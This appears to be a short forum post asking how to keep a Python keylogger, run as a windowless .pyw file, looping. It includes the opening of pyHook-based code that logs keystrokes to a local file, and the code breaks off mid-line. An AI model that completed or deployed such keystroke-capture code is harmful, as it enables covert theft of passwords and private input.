Help with my keylogger
I'm working on a simple key logger. I'm having a problem though, when I try to run it as a .pyw the program shuts down before it can record anything. I believe it needs to loop, how would I go about this? import pythoncom, pyHook, sys, logging, time LOG_FILENAME = 'C:\KeyLog\log.out' def OnKeyboardEvent(event): keytime = time....